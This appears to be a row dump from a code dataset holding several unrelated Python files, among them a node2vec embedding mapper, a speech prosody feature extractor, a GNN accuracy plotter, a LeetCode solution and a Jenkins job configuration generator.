self.ave = (self.ave * self._m) + (self._i * sample)
|
15,692 | 96180493e4518b63981eddd51bed5a4bcdaaed4d | a=0
b=1
i=0
print(a)
print(b)
while(i<10):
c=a+b
a=b
b=c
i=i+1
print (c)
|
15,693 | 42684432d73ee255c78b8ca8805f91730568eb49 | import pandas as pd
import numpy as np
import torch
import pickle
import os
DIM_NODE2VEC = 128
PATH_NODE2VEC = 'cit_128.emb'
#ID_SRC = '../data/task2_trainset.csv' # generating node_vec for train/valid set
ID_SRC = '../data/task2_public_testset.csv' # generating node_vec for test set
# read the vectors and corresponding paperid's
if os.path.exists('paperid_vec.npy') and os.path.exists('paperid.npy'):
paperid_vec = np.load('paperid_vec.npy')
paperid = np.load('paperid.npy')
print('npy files loaded.')
else:
cit_emb = np.loadtxt(PATH_NODE2VEC, delimiter=' ', skiprows=1)
paperid_vec = cit_emb[:, 1:]
paperid = cit_emb[:, 0].astype(np.uint32)
np.save('paperid_vec', paperid_vec)
np.save('paperid', paperid)
print('npy files saved.')
DIM_NODE2VEC = paperid_vec.shape[1]
print(paperid_vec.shape)
print(paperid.shape)
print(paperid_vec[:5, :5])
print(paperid[:10])
# generate or load the paperid-tensor dict.
if os.path.exists('paperid2vec_dict.pkl'):
with open('paperid2vec_dict.pkl', 'rb') as file:
paperid2vec_dict = pickle.load(file)
print('pkl loaded.')
else:
# build a paperid-tensor dict
paperid2vec_dict = {}
_total_samples_num = paperid_vec.shape[0]
for index, id in enumerate(paperid):
print(f'converting... {index}/{_total_samples_num}', end='\r')
paperid2vec_dict[id] = torch.from_numpy(paperid_vec[index]).reshape((1, DIM_NODE2VEC))
print('\n')
with open('paperid2vec_dict.pkl', 'wb') as file:
pickle.dump(paperid2vec_dict, file)
print(len(paperid2vec_dict))
print(paperid2vec_dict[1671395369])
# mapping id with tensor
dataset_id = pd.read_csv(ID_SRC, dtype=str)['Id'] # list of id's
id_paperId = dict(pd.read_csv('id_paperId.tsv', sep='\t').values) # id to paperId
print('id_paperId.shape: ', len(id_paperId))
node_vec = torch.zeros((0, DIM_NODE2VEC)).type(torch.DoubleTensor)
_total_samples_num = dataset_id.shape[0]
hit, miss = 0, 0
for index, id in enumerate(dataset_id):
print(f'dealing with {index}/{_total_samples_num}...', end='\r')
if id in id_paperId:
PaperId = id_paperId[id]
if PaperId in paperid2vec_dict:
node_vec = torch.cat((node_vec, paperid2vec_dict[PaperId]), 0)
hit += 1
else:
node_vec = torch.cat((node_vec, torch.zeros((1, DIM_NODE2VEC)).type(torch.DoubleTensor)), 0)
miss += 1
else:
node_vec = torch.cat((node_vec, torch.zeros((1, DIM_NODE2VEC)).type(torch.DoubleTensor)), 0)
miss += 1
print('\n')
print('final tensor shape: ', node_vec.shape)
print(node_vec[:30, :5])
print('hit: ', hit)
print('miss: ', miss)
print('total:', hit+miss)
# saving the node vector
with open('node_vec.pkl', 'wb') as file:
pickle.dump(node_vec, file)
print('node_vec.pkl saved.') |
15,694 | 3e3b8c5fce934431a7717409003ba84545bda121 | import numpy as np
from matplotlib import pyplot as plt
import json
def plot_hist(history1, history2, history3, history4, history5, dataset):
fig = plt.figure(figsize=(8, 3))
epochs = np.arange(1, 101)
plt.subplot(1, 2, 1)
plt.plot(epochs, history1['acc'], label='GAT')
plt.plot(epochs, history2['acc'], label='GCN')
plt.plot(epochs, history3['acc'], label='PPNP')
plt.plot(epochs, history4['acc'], label='RGCN')
plt.plot(epochs, history5['acc'], label='SGC')
plt.xlabel('Epochs')
plt.grid(True)
plt.legend()
plt.ylabel('Acc')
plt.subplot(1, 2, 2)
plt.plot(epochs, history1['val_acc'], label='GAT')
plt.plot(epochs, history2['val_acc'], label='GCN')
plt.plot(epochs, history3['val_acc'], label='PPNP')
plt.plot(epochs, history4['val_acc'], label='RGCN')
plt.plot(epochs, history5['val_acc'], label='SGC')
plt.xlabel('Epochs')
plt.ylabel('Val Acc')
plt.grid(True)
plt.legend()
fig.suptitle(dataset.upper())
plt.tight_layout()
plt.savefig('nc_'+ dataset+'_acc.svg')
def main():
history = []
for i, (algo, dataset) in enumerate([(algo, dataset) for algo in ['gat', 'gcn', 'ppnp', 'rgcn', 'sgc'] for dataset in ['aifb', 'citeseer', 'cora', 'pubmed']]):
with open(algo + '_' + dataset + '_history.json', 'rt') as f:
history.append(json.load(f))
plot_hist(history[0], history[4], history[8], history[12], history[16], 'aifb')
plot_hist(history[1], history[5], history[9], history[13], history[17], 'citeseer')
plot_hist(history[2], history[6], history[10], history[14], history[18], 'cora')
plot_hist(history[3], history[7], history[11], history[15], history[19], 'pubmed')
if __name__ == '__main__':
main()
|
15,695 | 943c0a70aa99cef039fa07ac1b6dc919e7e08f4d |
# -*- coding: utf-8 -*-
"""
Created on Jul 21 2017, Modified Apr 10 2018.
@author: J. C. Vasquez-Correa, T. Arias-Vergara, J. S. Guerrero
"""
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import torch
import pandas as pd
import pysptk
from matplotlib import cm
from scipy.io.wavfile import read
import os
import sys
PATH = os.path.dirname(os.path.realpath(__file__))
sys.path.append(PATH+'/../')
sys.path.append(PATH)
plt.rcParams["font.family"] = "Times New Roman"
from prosody_functions import V_UV, F0feat, energy_cont_segm, polyf0, energy_feat, dur_seg, duration_feat, get_energy_segment
from script_mananger import script_manager
from utils import save_dict_kaldimat, get_dict
import praat.praat_functions as praat_functions
class Prosody:
"""
Compute prosody features from continuous speech based on duration, fundamental frequency and energy.
Static or dynamic matrices can be computed:
Static matrix is formed with 103 features and include
1-6 F0-contour: Avg., Std., Max., Min., Skewness, Kurtosis
7-12 Tilt of a linear estimation of F0 for each voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
13-18 MSE of a linear estimation of F0 for each voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
19-24 F0 on the first voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
25-30 F0 on the last voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
31-34 energy-contour for voiced segments: Avg., Std., Skewness, Kurtosis
35-38 Tilt of a linear estimation of energy contour for V segments: Avg., Std., Skewness, Kurtosis
39-42 MSE of a linear estimation of energy contour for V segment: Avg., Std., Skewness, Kurtosis
43-48 energy on the first voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
49-54 energy on the last voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
55-58 energy-contour for unvoiced segments: Avg., Std., Skewness, Kurtosis
59-62 Tilt of a linear estimation of energy contour for U segments: Avg., Std., Skewness, Kurtosis
63-66 MSE of a linear estimation of energy contour for U segments: Avg., Std., Skewness, Kurtosis
67-72 energy on the first unvoiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
73-78 energy on the last unvoiced segment: Avg., Std., Max., Min., Skewness, Kurtosis
79 Voiced rate: Number of voiced segments per second
80-85 Duration of Voiced: Avg., Std., Max., Min., Skewness, Kurtosis
86-91 Duration of Unvoiced: Avg., Std., Max., Min., Skewness, Kurtosis
92-97 Duration of Pauses: Avg., Std., Max., Min., Skewness, Kurtosis
98-103 Duration ratios: Pause/(Voiced+Unvoiced), Pause/Unvoiced, Unvoiced/(Voiced+Unvoiced),Voiced/(Voiced+Unvoiced), Voiced/Puase, Unvoiced/Pause
Dynamic matrix is formed with 13 features computed for each voiced segment and contains
1-6. Coefficients of 5-degree Lagrange polynomial to model F0 contour
7-12. Coefficients of 5-degree Lagrange polynomial to model energy contour
13. Duration of the voiced segment
Dynamic prosody features are based on
Najim Dehak, "Modeling Prosodic Features With Joint Factor Analysis for Speaker Verification", 2007
Script is called as follows
>>> python prosody.py <file_or_folder_audio> <file_features> <static (true or false)> <plots (true or false)> <format (csv, txt, npy, kaldi, torch)>
Examples command line:
>>> python Prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesAst.txt" "true" "true" "txt"
>>> python Prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesUst.csv" "true" "true" "csv"
>>> python prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesUdyn.pt" "false" "true" "torch"
>>> python Prosody.py "../audios/" "prosodyfeaturesst.txt" "true" "false" "txt"
>>> python Prosody.py "../audios/" "prosodyfeaturesst.csv" "true" "false" "csv"
>>> python Prosody.py "../audios/" "prosodyfeaturesdyn.pt" "false" "false" "torch"
>>> python Prosody.py "../audios/" "prosodyfeaturesdyn.csv" "false" "false" "csv"
Examples directly in Python
>>> prosody=Prosody()
>>> file_audio="../audios/001_ddk1_PCGITA.wav"
>>> features1=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="npy")
>>> features2=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="dataframe")
>>> features3=prosody.extract_features_file(file_audio, static=False, plots=True, fmt="torch")
>>> prosody.extract_features_file(file_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test")
>>> path_audio="../audios/"
>>> features1=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="npy")
>>> features2=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="csv")
>>> features3=prosody.extract_features_path(path_audio, static=False, plots=True, fmt="torch")
>>> prosody.extract_features_path(path_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test.ark")
"""
def __init__(self):
self.pitch_method = "rapt"
self.size_frame = 0.02
self.step = 0.01
self.thr_len = 0.14
self.minf0 = 60
self.maxf0 = 350
self.voice_bias = -0.2
self.P = 5
self.namefeatf0 = ["F0avg", "F0std", "F0max", "F0min",
"F0skew", "F0kurt", "F0tiltavg", "F0mseavg",
"F0tiltstd", "F0msestd", "F0tiltmax", "F0msemax",
"F0tiltmin", "F0msemin", "F0tiltskw", "F0mseskw",
"F0tiltku", "F0mseku", "1F0mean", "1F0std",
"1F0max", "1F0min", "1F0skw", "1F0ku", "lastF0avg",
"lastF0std", "lastF0max", "lastF0min", "lastF0skw", "lastF0ku"]
self.namefeatEv = ["avgEvoiced", "stdEvoiced", "skwEvoiced", "kurtosisEvoiced",
"avgtiltEvoiced", "stdtiltEvoiced", "skwtiltEvoiced", "kurtosistiltEvoiced",
"avgmseEvoiced", "stdmseEvoiced", "skwmseEvoiced", "kurtosismseEvoiced",
"avg1Evoiced", "std1Evoiced", "max1Evoiced", "min1Evoiced", "skw1Evoiced",
"kurtosis1Evoiced", "avglastEvoiced", "stdlastEvoiced", "maxlastEvoiced",
"minlastEvoiced", "skwlastEvoiced", "kurtosislastEvoiced"]
self.namefeatEu = ["avgEunvoiced", "stdEunvoiced", "skwEunvoiced", "kurtosisEunvoiced",
"avgtiltEunvoiced", "stdtiltEunvoiced", "skwtiltEunvoiced", "kurtosistiltEunvoiced",
"avgmseEunvoiced", "stdmseEunvoiced", "skwmseEunvoiced", "kurtosismseEunvoiced",
"avg1Eunvoiced", "std1Eunvoiced", "max1Eunvoiced", "min1Eunvoiced", "skw1Eunvoiced",
"kurtosis1Eunvoiced", "avglastEunvoiced", "stdlastEunvoiced", "maxlastEunvoiced",
"minlastEunvoiced", "skwlastEunvoiced", "kurtosislastEunvoiced"]
self.namefeatdur = ["Vrate", "avgdurvoiced", "stddurvoiced", "skwdurvoiced", "kurtosisdurvoiced", "maxdurvoiced", "mindurvoiced",
"avgdurunvoiced", "stddurunvoiced", "skwdurunvoiced", "kurtosisdurunvoiced", "maxdurunvoiced", "mindurunvoiced",
"avgdurpause", "stddurpause", "skwdurpause", "kurtosisdurpause", "maxdurpause", "mindurpause",
"PVU", "PU", "UVU", "VVU", "VP", "UP"]
self.head_st = self.namefeatf0+self.namefeatEv+self.namefeatEu+self.namefeatdur
self.namef0d = ["f0coef"+str(i) for i in range(6)]
self.nameEd = ["Ecoef"+str(i) for i in range(6)]
self.head_dyn = self.namef0d+self.nameEd+["Voiced duration"]
def plot_pros(self, data_audio, fs, F0, segmentsV, segmentsU, F0_features):
"""Plots of the prosody features
:param data_audio: speech signal.
:param fs: sampling frequency
:param F0: contour of the fundamental frequency
:param segmentsV: list with the voiced segments
:param segmentsU: list with the unvoiced segments
:param F0_features: vector with f0-based features
:returns: plots of the prosody features.
"""
plt.figure(figsize=(6, 6))
plt.subplot(211)
ax1 = plt.gca()
t = np.arange(len(data_audio))/float(fs)
colors = cm.get_cmap('Accent', 5)
ax1.plot(t, data_audio, 'k', label="speech signal",
alpha=0.5, color=colors.colors[4])
ax1.set_ylabel('Amplitude', fontsize=12)
ax1.set_xlabel('Time (s)', fontsize=12)
ax1.set_xlim([0, t[-1]])
ax2 = ax1.twinx()
fsp = len(F0)/t[-1]
t2 = np.arange(len(F0))/fsp
ax2.plot(
t2, F0, color=colors.colors[0], linewidth=2, label=r"Real $F_0$", alpha=0.5)
ax2.set_ylabel(r'$F_0$ (Hz)', color=colors.colors[0], fontsize=12)
ax2.tick_params('y', colors=colors.colors[0])
p0 = np.where(F0 != 0)[0]
f0avg = np.nanmean(np.where(F0 != 0, F0, np.nan))
f0std = np.std(F0[p0])
ax2.plot([t2[0], t2[-1]], [f0avg, f0avg],
color=colors.colors[2], label=r"Avg. $F_0$")
ax2.fill_between([t2[0], t2[-1]], y1=[f0avg+f0std, f0avg+f0std], y2=[f0avg-f0std,
f0avg-f0std], color=colors.colors[2], alpha=0.2, label=r"Avg. $F_0\pm$ SD.")
F0rec = polyf0(F0)
ax2.plot(t2, F0rec, label=r"estimated $F_0$",
c=colors.colors[1], linewidth=2.0)
plt.text(t2[2], np.max(F0)-5, r"$F_0$ SD.=" +
str(np.round(f0std, 1))+" Hz")
plt.text(t2[2], np.max(F0)-20, r"$F_0$ tilt.=" +
str(np.round(F0_features[6], 1))+" Hz")
plt.legend(ncol=2, loc=8)
plt.subplot(212)
size_frameS = 0.02*float(fs)
size_stepS = 0.01*float(fs)
logE = energy_cont_segm([data_audio], size_frameS, size_stepS)
Esp = len(logE[0])/t[-1]
t2 = np.arange(len(logE[0]))/float(Esp)
plt.plot(t2, logE[0], color='k', linewidth=2.0)
plt.xlabel('Time (s)', fontsize=12)
plt.ylabel('Energy (dB)', fontsize=12)
plt.xlim([0, t[-1]])
plt.grid(True)
plt.tight_layout()
plt.show()
plt.figure(figsize=(6, 3))
Ev = energy_cont_segm(segmentsV, size_frameS, size_stepS)
Eu = energy_cont_segm(segmentsU, size_frameS, size_stepS)
plt.plot([np.mean(Ev[j])
for j in range(len(Ev))], label="Voiced energy")
plt.plot([np.mean(Eu[j])
for j in range(len(Eu))], label="Unvoiced energy")
plt.xlabel("Number of segments")
plt.ylabel("Energy (dB)")
plt.legend()
plt.grid()
plt.tight_layout()
plt.show()
def extract_static_features(self, audio, plots, fmt):
features = self.prosody_static(audio, plots)
if fmt in ("npy", "txt"):
return features
elif fmt in ("dataframe", "csv"):
df = {}
for e, k in enumerate(self.head_st):
df[k] = [features[e]]
return pd.DataFrame(df)
elif fmt == "torch":
feat_t = torch.from_numpy(features)
return feat_t
elif fmt == "kaldi":
raise ValueError("Kaldi is only supported for dynamic features")
raise ValueError("format" + fmt+" is not supported")
def extract_dynamic_features(self, audio, fmt, kaldi_file=""):
features = self.prosody_dynamic(audio)
if fmt in ("npy", "txt"):
return features
if fmt in ("dataframe", "csv"):
df = {}
for e, k in enumerate(self.head_dyn):
df[k] = features[:, e]
return pd.DataFrame(df)
if fmt == "torch":
feat_t = torch.from_numpy(features)
return feat_t
if fmt == "kaldi":
name_all = audio.split('/')
dictX = {name_all[-1]: features}
save_dict_kaldimat(dictX, kaldi_file)
else:
raise ValueError("format" + fmt+" is not supported")
def extract_features_file(self, audio, static=True, plots=False, fmt="npy", kaldi_file=""):
"""Extract the prosody features from an audio file
:param audio: .wav audio file.
:param static: whether to compute and return statistic functionals over the feature matrix, or return the feature matrix computed over frames
:param plots: timeshift to extract the features
:param fmt: format to return the features (npy, dataframe, torch, kaldi)
:param kaldi_file: file to store kaldi features, only valid when fmt=="kaldi"
:returns: features computed from the audio file.
>>> prosody=Prosody()
>>> file_audio="../audios/001_ddk1_PCGITA.wav"
>>> features1=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="npy")
>>> features2=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="dataframe")
>>> features3=prosody.extract_features_file(file_audio, static=False, plots=True, fmt="torch")
>>> prosody.extract_features_file(file_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test")
"""
if static:
return self.extract_static_features(audio, plots, fmt)
else:
return self.extract_dynamic_features(audio, fmt, kaldi_file)
def prosody_static(self, audio, plots):
"""Extract the static prosody features from an audio file
:param audio: .wav audio file.
:param plots: timeshift to extract the features
:returns: array with the 103 prosody features
>>> prosody=Prosody()
>>> file_audio="../audios/001_ddk1_PCGITA.wav"
>>> features=prosody.prosody_static(file_audio, plots=True)
"""
fs, data_audio = read(audio)
if len(data_audio.shape)>1:
data_audio = data_audio.mean(1)
data_audio = data_audio-np.mean(data_audio)
data_audio = data_audio/float(np.max(np.abs(data_audio)))
size_frameS = self.size_frame*float(fs)
size_stepS = self.step*float(fs)
thr_len_pause = self.thr_len*float(fs)
if self.pitch_method == 'praat':
name_audio = audio.split('/')
temp_uuid = 'prosody'+name_audio[-1][0:-4]
if not os.path.exists(PATH+'/../tempfiles/'):
os.makedirs(PATH+'/../tempfiles/')
temp_filename_f0 = PATH+'/../tempfiles/tempF0'+temp_uuid+'.txt'
temp_filename_vuv = PATH+'/../tempfiles/tempVUV'+temp_uuid+'.txt'
praat_functions.praat_vuv(audio, temp_filename_f0, temp_filename_vuv,
time_stepF0=self.step, minf0=self.minf0, maxf0=self.maxf0)
F0, _ = praat_functions.decodeF0(
temp_filename_f0, len(data_audio)/float(fs), self.step)
os.remove(temp_filename_f0)
os.remove(temp_filename_vuv)
elif self.pitch_method == 'rapt':
data_audiof = np.asarray(data_audio*(2**15), dtype=np.float32)
F0 = pysptk.sptk.rapt(data_audiof, fs, int(
size_stepS), min=self.minf0, max=self.maxf0, voice_bias=self.voice_bias, otype='f0')
segmentsV = V_UV(F0, data_audio, type_seg="Voiced",
size_stepS=size_stepS)
segmentsUP = V_UV(F0, data_audio, type_seg="Unvoiced",
size_stepS=size_stepS)
segmentsP = []
segmentsU = []
for k in range(len(segmentsUP)):
if (len(segmentsUP[k]) > thr_len_pause):
segmentsP.append(segmentsUP[k])
else:
segmentsU.append(segmentsUP[k])
F0_features = F0feat(F0)
energy_featuresV = energy_feat(segmentsV, fs, size_frameS, size_stepS)
energy_featuresU = energy_feat(segmentsU, fs, size_frameS, size_stepS)
duration_features = duration_feat(
segmentsV, segmentsU, segmentsP, data_audio, fs)
if plots:
self.plot_pros(data_audio, fs, F0, segmentsV,
segmentsU, F0_features)
features = np.hstack(
(F0_features, energy_featuresV, energy_featuresU, duration_features))
return features
def prosody_dynamic(self, audio):
"""Extract the dynamic prosody features from an audio file
:param audio: .wav audio file.
:returns: array (N,13) with the prosody features extracted from an audio file. N= number of voiced segments
>>> prosody=Prosody()
>>> file_audio="../audios/001_ddk1_PCGITA.wav"
>>> features=prosody.prosody_dynamic(file_audio)
"""
fs, data_audio = read(audio)
if len(data_audio.shape)>1:
data_audio = data_audio.mean(1)
data_audio = data_audio-np.mean(data_audio)
data_audio = data_audio/float(np.max(np.abs(data_audio)))
size_frameS = self.size_frame*float(fs)
size_stepS = self.step*float(fs)
overlap = size_stepS/size_frameS
if self.pitch_method == 'praat':
name_audio = audio.split('/')
temp_uuid = 'prosody'+name_audio[-1][0:-4]
if not os.path.exists(PATH+'/../tempfiles/'):
os.makedirs(PATH+'/../tempfiles/')
temp_filename_f0 = PATH+'/../tempfiles/tempF0'+temp_uuid+'.txt'
temp_filename_vuv = PATH+'/../tempfiles/tempVUV'+temp_uuid+'.txt'
praat_functions.praat_vuv(audio, temp_filename_f0, temp_filename_vuv,
time_stepF0=self.step, minf0=self.minf0, maxf0=self.maxf0)
F0, _ = praat_functions.decodeF0(
temp_filename_f0, len(data_audio)/float(fs), self.step)
os.remove(temp_filename_f0)
os.remove(temp_filename_vuv)
elif self.pitch_method == 'rapt':
data_audiof = np.asarray(data_audio*(2**15), dtype=np.float32)
F0 = pysptk.sptk.rapt(data_audiof, fs, int(
size_stepS), min=self.minf0, max=self.maxf0, voice_bias=self.voice_bias, otype='f0')
pitchON = np.where(F0 != 0)[0]
dchange = np.diff(pitchON)
change = np.where(dchange > 1)[0]
iniV = pitchON[0]
featvec = []
iniVoiced = (pitchON[0]*size_stepS)+size_stepS
seg_voiced = []
f0v = []
Ev = []
for indx in change:
finV = pitchON[indx]+1
finVoiced = (pitchON[indx]*size_stepS)+size_stepS
VoicedSeg = data_audio[int(iniVoiced):int(finVoiced)]
temp = F0[iniV:finV]
tempvec = []
if len(VoicedSeg) > int(size_frameS):
seg_voiced.append(VoicedSeg)
dur = len(VoicedSeg)/float(fs)
x = np.arange(0,len(temp))
z = np.poly1d(np.polyfit(x,temp,self.P))
f0v.append(temp)
tempvec.extend(z.coeffs)
temp=get_energy_segment(size_frameS, size_stepS, VoicedSeg, overlap)
Ev.append(temp)
x = np.arange(0, len(temp))
z = np.poly1d(np.polyfit(x, temp, self.P))
tempvec.extend(z.coeffs)
tempvec.append(dur)
featvec.append(tempvec)
iniV = pitchON[indx+1]
iniVoiced = (pitchON[indx+1]*size_stepS)+size_stepS
# Add the last voiced segment
finV = (pitchON[len(pitchON)-1])
finVoiced = (pitchON[len(pitchON)-1]*size_stepS)+size_stepS
VoicedSeg = data_audio[int(iniVoiced):int(finVoiced)]
temp = F0[iniV:finV]
tempvec = []
if len(VoicedSeg) > int(size_frameS):
# Compute duration
dur = len(VoicedSeg)/float(fs)
x = np.arange(0, len(temp))
z = np.poly1d(np.polyfit(x, temp, self.P))
tempvec.extend(z.coeffs)
# Energy coefficients
temp=get_energy_segment(size_frameS, size_stepS, VoicedSeg, overlap)
x = np.arange(0, len(temp))
z = np.poly1d(np.polyfit(x, temp, self.P))
tempvec.extend(z.coeffs)
tempvec.append(dur)
# Compute duration
featvec.append(tempvec)
return np.asarray(featvec)
def extract_features_path(self, path_audio, static=True, plots=False, fmt="npy", kaldi_file=""):
"""Extract the prosody features for audios inside a path
:param path_audio: directory with (.wav) audio files inside, sampled at 16 kHz
:param static: whether to compute and return statistic functionals over the feature matrix, or return the feature matrix computed over frames
:param plots: timeshift to extract the features
:param fmt: format to return the features (npy, dataframe, torch, kaldi)
:param kaldi_file: file to store kaldifeatures, only valid when fmt=="kaldi"
:returns: features computed from the audio file.
>>> prosody=Prosody()
>>> path_audio="../audios/"
>>> features1=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="npy")
>>> features2=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="csv")
>>> features3=prosody.extract_features_path(path_audio, static=False, plots=True, fmt="torch")
>>> prosody.extract_features_path(path_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test.ark")
"""
hf = os.listdir(path_audio)
hf.sort()
pbar = tqdm(range(len(hf)))
ids = []
Features = []
for j in pbar:
pbar.set_description("Processing %s" % hf[j])
audio_file = path_audio+hf[j]
feat = self.extract_features_file(
audio_file, static=static, plots=plots, fmt="npy")
Features.append(feat)
if static:
ids.append(hf[j])
else:
ids.append(np.repeat(hf[j], feat.shape[0]))
Features = np.vstack(Features)
ids = np.hstack(ids)
return self.save_features(Features, ids, fmt, static, kaldi_file)
def save_features(self, Features, ids, fmt, static, kaldi_file):
if fmt in ("npy", "txt"):
return Features
elif fmt in ("dataframe", "csv"):
df = {}
if static:
head = self.head_st
else:
head = self.head_dyn
for e, k in enumerate(head):
df[k] = Features[:, e]
df["id"] = ids
return pd.DataFrame(df)
elif fmt == "torch":
return torch.from_numpy(Features)
elif fmt == "kaldi":
if static:
raise ValueError(
"Kaldi is only supported for dynamic features")
dictX = get_dict(Features, ids)
save_dict_kaldimat(dictX, kaldi_file)
else:
raise ValueError(fmt+" is not supported")
if __name__ == "__main__":
if len(sys.argv) != 6:
print("python prosody.py <file_or_folder_audio> <file_features> <static (true, false)> <plots (true, false)> <format (csv, txt, npy, kaldi, torch)>")
sys.exit()
prosody = Prosody()
script_manager(sys.argv, prosody)
|
15,696 | d4abd5f9659022f62ff9d6ff587653c9103f0dd7 | import sys
print("Path ==>", sys.path)
|
15,697 | 5fafeac43bd9fd6b98b7482eb63d0ab26a830117 | '''
-*- coding: utf-8 -*-
@Author : Simon Zhang
@Time : 2019/11/22 0:15
@Software: PyCharm
@File : 117.py
'''
# 给出一个函数 f(x, y) 和一个目标结果 z,请你计算方程 f(x,y) == z 所有可能的正整数 数对 x 和 y。
#
# 给定函数是严格单调的,也就是说:
#
# f(x, y) < f(x + 1, y)
# f(x, y) < f(x, y + 1)
# 函数接口定义如下:
#
# interface CustomFunction {
# public:
# // Returns positive integer f(x, y) for any given positive integer x and y.
# int f(int x, int y);
# };
# 如果你想自定义测试,你可以输入整数 function_id 和一个目标结果 z 作为输入,其中 function_id 表示一个隐藏函数列表中的一个函数编号,题目只会告诉你列表中的 2 个函数。
#
# 你可以将满足条件的 结果数对 按任意顺序返回。
#
#
#
# 示例 1:
#
# 输入:function_id = 1, z = 5
# 输出:[[1,4],[2,3],[3,2],[4,1]]
# 解释:function_id = 1 表示 f(x, y) = x + y
# 示例 2:
#
# 输入:function_id = 2, z = 5
# 输出:[[1,5],[5,1]]
# 解释:function_id = 2 表示 f(x, y) = x * y
#
#
# 提示:
#
# 1 <= function_id <= 9
# 1 <= z <= 100
# 题目保证 f(x, y) == z 的解处于 1 <= x, y <= 1000 的范围内。
# 在 1 <= x, y <= 1000 的前提下,题目保证 f(x, y) 是一个 32 位有符号整数。
class Solution:
def findSolution(self, customfunction: 'CustomFunction', z: int) -> List[List[int]]:
y, g = z, customfunction.f
for x in range(1, z + 1):
while y:
d = g(x, y) - z
if d <= 0:
if not d:
yield [x, y]
break
y -= 1
|
15,698 | 66b5a4c574772c0e24ded26fb7304ef73766e74d | from argparse import Namespace
from sys import argv as argument_vector, exit as system_exit
from lxml.etree import Element
from python_utility.custom_argument_parser import CustomArgumentParser
from jenkins_job_manager.freestyle_project_builder.freestyle_settings \
import FreestyleSettings
from jenkins_job_manager.freestyle_project_builder.freestyle_project_builder \
import FreestyleProjectBuilder
from jenkins_job_manager.freestyle_project_builder.publisher_settings \
import PublisherSettings
from jenkins_job_manager.lxml_helper import serialize_element
from jenkins_job_manager.project_builder import ProjectBuilder
from jenkins_job_manager.repository_settings import RepositorySettings
from jenkins_job_manager.workflow_project_builder.workflow_project_builder \
import WorkflowProjectBuilder
class JenkinsJobManager:
FREESTYLE_JOB_TYPE = 'freestyle'
WORKFLOW_JOB_TYPE = 'workflow'
def __init__(self, arguments: list):
self.parsed_arguments = self._create_parser().parse_args(arguments)
@staticmethod
def create_publisher_settings(
parsed_arguments: Namespace
) -> PublisherSettings:
publisher_settings = PublisherSettings()
publisher_settings.junit = parsed_arguments.junit
publisher_settings.hypertext_report = parsed_arguments.hypertext_report
publisher_settings.checkstyle = parsed_arguments.checkstyle
publisher_settings.jacoco = parsed_arguments.jacoco
publisher_settings.recipients = parsed_arguments.recipients
return publisher_settings
@staticmethod
def main():
system_exit(JenkinsJobManager(argument_vector[1:]).run())
def run(self) -> int:
print('<?xml version="1.1" encoding="UTF-8"?>')
print(self.generate_serialized_xml().strip())
return 0
@staticmethod
def get_job_types() -> list:
return [
JenkinsJobManager.FREESTYLE_JOB_TYPE,
JenkinsJobManager.WORKFLOW_JOB_TYPE
]
@staticmethod
def _add_required_arguments(parser: CustomArgumentParser) -> None:
required_group = parser.add_argument_group('required named arguments')
required_group.add_argument(
'--locator',
help='locator to the repository to check out on Jenkins',
required=True,
)
@staticmethod
def _add_publisher_arguments(parser: CustomArgumentParser) -> None:
parser.add_argument(
'--junit',
help='Set the JUnit output to publish.',
default='',
)
parser.add_argument(
'--hypertext-report',
help='Set the hypertext report to publish.',
default='',
)
parser.add_argument(
'--checkstyle',
help='Set the checkstyle output to publish.',
default='',
)
parser.add_argument(
'--jacoco',
help='Enable publishing JaCoCo output.',
action='store_true',
)
@staticmethod
def _create_parser() -> CustomArgumentParser:
parser = CustomArgumentParser(
description='Generate a configuration for a Jenkins job.'
)
JenkinsJobManager._add_required_arguments(parser=parser)
parser.add_argument(
'--type',
help='Repository type.',
choices=RepositorySettings.get_repository_types(),
)
parser.add_argument(
'--build-command',
help='Set the build command.',
default='',
)
JenkinsJobManager._add_publisher_arguments(parser=parser)
parser.add_argument(
'--description',
help='Set the job description.',
default='',
)
parser.add_argument(
'--labels',
help='Set the job labels.',
default='',
)
parser.add_argument(
'--recipients',
help='Set mail recipients in case of build failure, '
'whitespace-separated.',
default='',
)
parser.add_argument(
'--job-type',
help='Job type.',
choices=JenkinsJobManager.get_job_types(),
default=JenkinsJobManager.FREESTYLE_JOB_TYPE,
)
return parser
def generate_xml(self) -> Element:
builder: ProjectBuilder
repository_settings = RepositorySettings(
repository_type=self.parsed_arguments.type,
repository_locator=self.parsed_arguments.locator,
)
if self.parsed_arguments.job_type is JenkinsJobManager \
.FREESTYLE_JOB_TYPE:
builder = FreestyleProjectBuilder(
repository_settings=repository_settings,
publisher_settings=JenkinsJobManager.create_publisher_settings(
parsed_arguments=self.parsed_arguments
),
freestyle_settings=FreestyleSettings(
build_command=self.parsed_arguments.build_command,
labels=self.parsed_arguments.labels,
),
)
elif self.parsed_arguments.job_type is JenkinsJobManager \
.WORKFLOW_JOB_TYPE:
builder = WorkflowProjectBuilder(
repository_settings=repository_settings,
)
else:
raise RuntimeError(
'Unexpected job type: ' + self.parsed_arguments.job_type
)
builder.description = self.parsed_arguments.description
return builder.build()
def generate_serialized_xml(self) -> str:
return serialize_element(self.generate_xml())
|
15,699 | 459d7a873e6ed14e1f5d58ebd2bc9b0c6e2b3a2c | "A module for testing the add food feature"
import unittest
from tests.base_test import BaseTestCase
from app.views.menu_blueprint import order_obj
